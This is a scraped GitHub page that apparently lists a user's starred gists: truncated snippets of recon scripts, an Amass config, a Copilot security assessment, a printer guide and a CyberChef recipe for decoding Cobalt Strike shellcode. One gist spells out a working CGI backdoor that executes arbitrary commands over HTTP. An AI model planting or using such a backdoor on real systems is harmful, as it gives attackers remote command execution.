Skip to content

Instantly share code, notes, and snippets.

View clevernyyyy's full-sized avatar

Adam Schaal clevernyyyy

50 followers · 57 following
View GitHub Profile
@testanull
testanull / asdklajsdlkajsdlkajsdakjsdhalskdasdioasiodaklsd.py
Created September 28, 2021 16:05
import requests
import random
import string
import sys
import time
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
@0xabad1dea
0xabad1dea / copilot-risk-assessment.md
Last active September 11, 2023 10:21
Risk Assessment of GitHub Copilot

Risk Assessment of GitHub Copilot

0xabad1dea, July 2021

this is a rough draft and may be updated with more examples

GitHub was kind enough to grant me swift access to the Copilot test phase despite me @'ing them several hundred times about ICE. I would like to examine it not in terms of productivity, but security. How risky is it to allow an AI to write some or all of your code?

Ultimately, a human being must take responsibility for every line of code that is committed. AI should not be used for "responsibility washing." However, Copilot is a tool, and workers need their tools to be reliable. A carpenter doesn't have to

@MarkBaggett
MarkBaggett / gist:38dcff6a0975f148aa858e924d64c492
Created November 14, 2020 18:22
http.server cgi backdoor
cd /tmp
mkdir cgi-bin
echo '#!/bin/bash' > ./cgi-bin/backdoor.cgi
echo 'echo -e "Content-Type: text/plain\n\n"' >> ./cgi-bin/backdoor.cgi
echo 'echo -e $($1)' >> ./cgi-bin/backdoor.cgi
chmod +x ./cgi-bin/backdoor.cgi
python -m http.server --cgi
@PatrikFehrenbach
PatrikFehrenbach / Amass Config
Created September 23, 2020 15:43
# Copyright 2017-2020 Jeff Foley. All rights reserved.
# Use of this source code is governed by Apache 2 LICENSE that can be found in the LICENSE file.
# Should results only be collected passively and without DNS resolution? Not recommended.
#mode = passive
mode = active
# The directory that stores the Cayley graph database and other output files
# The default for Linux systems is: $HOME/.config/amass
#output_directory = amass
@Sebazzz
Sebazzz / Creality-CR-6-Unboxing-guide.md
Last active August 16, 2024 14:31
Creality CR-6 Unboxing & assembly guide

CR-6 post-unboxing checklist

With most of the CR-6 SE issues being due to bad wiring or loose/too tight screws I feel like it is time for a good post-unboxing checklist, to be walked through pre-assembly. Even though I do not have my unit shipped yet, I've seen enough issues and fixes that I can compile this post.

I initially posted this on the independent CR-6 community Facebook group but since not everyone wants to use Facebook (which I totally understand), I will repost it here. I mirrored most of the relevant content of Facebook to imgur.

If you have any feedback or anything that needs to be added, please let me know and I will amend this post!

Note: There are some known issues with this printer - please read the entire guide. (It is long, I know, but this is a necessary evil!)

Communities

@pry0cc
pry0cc / grab-cns.sh
Created June 30, 2020 12:21
for ip in $(cat 1000.txt); do echo "Scanning $ip..."; cn=$(timeout 2 python3 dumpCN.py "$ip"); echo "{\"ip\":\"$ip\", \"cn\":\"$cn\"}" | tee -a results.txt | jq; done
@hakluke
hakluke / dumpCN.py
Last active September 18, 2022 10:52
#!/usr/bin/python3
import ssl,sys,json
cert = ssl.get_server_certificate((sys.argv[1], 443)) #Retrieve SSL server certificate
cert = ssl.PEM_cert_to_DER_cert(cert) #Convert certificate to DER format
begin = cert.rfind(b'\x06\x03\x55\x04\x03') + 7 #Find the last occurence of this byte string indicating the CN, add 7 bytes to startpoint to account for length of byte string and padding
end = begin + cert[begin - 1] #Set endpoint to startpoint + the length of the CN
jsondata = {"ip": sys.argv[1], "cn": cert[begin:end].decode('utf-8')}
print(json.dumps(jsondata))
@lanmaster53
lanmaster53 / Dockerfile
Last active March 20, 2023 13:36
Docker image for running Python 3 scripts in a throw-away environment.
FROM python:slim
ENV PYTHONDONTWRITEBYTECODE 1
ENV PYTHONUNBUFFERED 1
ENV TZ America/New_York
RUN mkdir -p /src
WORKDIR /src
@0xtornado
0xtornado / 0_CyberChef_CobaltStrike_Shellcode_Decoder_Recipe
Created April 30, 2020 14:11
CyberChef recipe to extract and decode Shellcode from a Cobalt Strike beacon
[{"op":"Conditional Jump","args":["bxor",false,"Decode_Shellcode",10]},{"op":"Label","args":["Decode_beacon"]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"Decode text","args":["UTF-16LE (1200)"]},{"op":"Regular expression","args":["User defined","[a-zA-Z0-9+/=]{30,}",true,true,false,false,false,false,"List matches"]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"Gunzip","args":[]},{"op":"Label","args":["Decode_Shellcode"]},{"op":"Regular expression","args":["User defined","[a-zA-Z0-9+/=]{30,}",true,true,false,false,false,false,"List matches"]},{"op":"Conditional Jump","args":["",false,"",10]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"XOR","args":[{"option":"Decimal","string":"35"},"Standard",false]}]
@kmcquade
kmcquade / AWS API calls that return credentials.md
Last active March 24, 2025 11:22
AWS API calls that return credentials